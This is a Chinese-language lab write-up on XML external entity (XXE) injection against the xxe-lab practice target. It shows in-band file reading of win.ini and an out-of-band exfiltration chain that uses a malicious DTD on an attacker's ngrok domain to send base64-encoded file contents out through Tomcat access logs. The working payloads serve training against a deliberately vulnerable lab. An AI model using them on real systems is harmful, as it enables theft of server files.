技术分析|XXE环境搭建及实战 包含有回显无回显操作

文章说明：

文章为山丘安全攻防实验室成员：O8原创

文章仅用于攻防技术学习，请勿用于非法用途

靶机环境

靶机地址：https://github.com/c0ny1/xxe-lab
搭建平台：VM、windows7、xampp
靶机IP：192.168.0.133

搭建说明：安装xampp后，htdocs目录放入靶机项目，然后开启apache、mysql访问即可

访问 http://192.168.0.133:8081/php_xxe/ (注意我这里是改了端口的)

攻击机环境

IP:192.168.0.165
操作系统：windows10
本次实验用到的工具：BurpSite、tomcat7、ngrok

有回显漏洞利用

攻击流程

实战

访问 http://192.168.0.133:8081/php_xxe/ 随意输入帐户名密码进行抓包

头部信息：Accept: application/xml, text/xml, */*;

尝试解析xxe

POC：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
  <!ENTITY xxe "Hacking">
]>
<user><username>&xxe;</username><password>123123</password></user>

代码被解析，尝试任意文件读取

POC：

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE ANY [
  <!ENTITY xxe SYSTEM "file:///c:/Windows/win.ini">
]>
<user><username>&xxe;</username><password>123123</password></user>

文件被正常读取 总结：攻击用到了file协议进行文件读取

不回显漏洞信息外带利用

攻击流程

环境搭建

有外网服务器的同学忽略这一步

不（我）想（没）用（有）外部服务器，就自己在攻击机上面搭建一个服务器，用于接收数据

说明：需要一个客户端转发内网地址到外网，从而实现穷屌接收数据的伟大梦想

环境：

tomcat7、ngrok、假设没有回显
在ngrok注册一个账号：https://www.ngrok.cc/
创建免费ngrok的http服务

注册成功后选择开通隧道–免费中国香港主机

选择http协议、隧道名称和前置域名填你自己的就行了

然后点击隧道管理，需要记录的是隧道ID和赠送域名

客户端下载地址：https://www.ngrok.cc/download.html

根据你的操作系统选择对应的客户端。

本地搭建tomcat服务器

下载tomcat、然后修改/conf/server.xml

 <Valve className="org.apache.catalina.valves.AccessLogValve" directory="logs"
           prefix="localhost_access_log." suffix=".txt"
           pattern='%h %p %H %l %u %t "%r" params={%{post}r} %s %bbytes %Dms' />

修改你在创建ngrok时的端口（tomcat默认80）

port="8998" 是我自己修改的http端口

    <Connector port="8998" protocol="HTTP/1.1"
               connectionTimeout="20000"
               redirectPort="8443" />

启动tomcat ./bin/startup.bat

ngrok运行

运行 Sunny-Ngrok启动工具.bat 然后填入刚开始记录的隧道id，点击回车

访问你自己的域名，出现tomcat说明环境搭建好了

实战演示

恶意DTD以及POC编写

第一步： 攻击者服务器建立O8.dtd并放入tomcat \webapps\ROOT\中

POC:

<!ENTITY % all 
  "<!ENTITY &#x25; send SYSTEM 'http://o8.free.idcfengye.com/?%file;'>"
>
%all;

第二步：攻击机中发送恶意XXE代码到攻击者服务器

POC：

<?xml version="1.0"?>
<!DOCTYPE ANY [
  <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/Windows/win.ini">
  <!ENTITY % dtd SYSTEM "http://o8.free.idcfengye.com/O8.dtd">
%dtd;
%send;
]>

实现效果

攻击者服务器tomcat运行着O8.dtd

抓包发送恶意XXE代码

攻击者服务器收到请求并将外带读取数据写入log文件

将带过来数据bash64解密

参考文献

https://mp.weixin.qq.com/s/VWofHp5lJLYnbw01copnkw

https://www.freebuf.com/vuls/194112.html

https://cloud.tencent.com/developer/article/1472487

https://www.secpulse.com/archives/850.html

https://www.secpulse.com/archives/6392.html

https://www.secpulse.com/archives/6256.html